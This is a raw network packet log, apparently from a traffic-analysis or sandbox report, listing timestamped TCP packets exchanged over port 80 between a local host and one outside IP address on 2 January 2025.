                                                                            Jan 2, 2025 20:34:51.598925114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.598952055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.598979950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599004984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599016905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599026918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599036932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599047899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599050999 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599062920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599078894 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599092007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599092960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599103928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599114895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599124908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599140882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599140882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599153042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599165916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599184036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599189043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.599195957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.599230051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.600826979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600841999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600852966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600862980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600874901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600883961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.600884914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600897074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600908041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.600914955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.600941896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601788998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601800919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601811886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601825953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601844072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601849079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601855040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601866007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601875067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601891994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601897955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601902962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601913929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601919889 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601931095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601933002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601942062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601952076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.601952076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601963997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601974964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.601986885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.602018118 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.602039099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602050066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602060080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602072954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602082014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.602101088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602102995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.602112055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602127075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602135897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.602138042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.602169991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.611830950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611846924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611865044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611876011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611881971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.611887932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611897945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611906052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.611910105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611921072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.611942053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.611967087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.614983082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615001917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615011930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615021944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615044117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.615062952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615067959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.615072966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615089893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615101099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.615102053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615111113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615114927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.615123034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.615150928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.615174055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.617332935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617387056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617393017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.617398024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617408991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617420912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617420912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.617434025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617448092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.617454052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.617480993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.617499113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.619975090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.619992971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620003939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620014906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620026112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620034933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620037079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.620062113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620075941 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.620099068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.620109081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.620136976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.624977112 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625036001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625046968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625057936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625067949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625080109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625099897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625127077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625138044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625148058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625157118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625165939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625175953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625190020 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625201941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625211000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625216961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625236034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625246048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625248909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625277042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625312090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625322104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625333071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625344992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625355005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625355959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625365019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.625385046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.625406981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.627273083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627286911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627305984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627326012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627332926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.627336025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627346992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627348900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.627357960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627367973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627379894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.627384901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.627407074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.627418995 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628156900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628201008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628207922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628211021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628221989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628233910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628240108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628245115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628261089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628284931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628293991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628300905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628307104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.628329039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.628343105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.682903051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682919025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682938099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682950974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682961941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682972908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682984114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.682991028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.682996035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.683024883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.683059931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.684808969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684860945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.684873104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684883118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684895992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684906960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684911966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.684919119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684930086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.684943914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.684986115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.685791969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685805082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685815096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685825109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685834885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685842037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.685844898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685857058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685866117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685872078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.685885906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.685909033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.685966969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685977936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.685987949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686002970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686012030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.686012983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686024904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686045885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.686053991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686058998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.686064959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.686091900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.686104059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.687468052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687484980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687517881 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.687537909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.687546968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687557936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687568903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687591076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687592983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.687602043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687612057 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.687621117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.687640905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688499928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688513041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688524008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688541889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688554049 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688556910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688568115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688577890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688590050 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688597918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688607931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688618898 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688620090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688628912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688640118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688641071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688657999 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688661098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688668966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688673973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688680887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688689947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688705921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688710928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688755989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688756943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688766956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688777924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688788891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688793898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688827991 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688848019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688859940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688870907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688879013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.688889980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.688911915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.698729038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698755026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698766947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698777914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698790073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698795080 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.698800087 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698812008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.698812962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.698854923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.701919079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.701951981 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.701987982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702008009 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702011108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702022076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702039957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702048063 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702049971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702059984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702064037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702075958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.702076912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702100039 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.702124119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.704257965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704298019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704314947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.704336882 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.704358101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704369068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704380989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704391003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704394102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.704402924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.704425097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.704468966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.706964970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707037926 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.707045078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707056046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707067966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707082033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.707083941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707096100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707099915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.707107067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.707133055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.707161903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.711803913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711852074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.711869955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711879969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711889982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711915970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.711915970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711926937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711937904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711950064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.711956024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.711994886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.712006092 CET804973047.254.187.72192.168.2.4
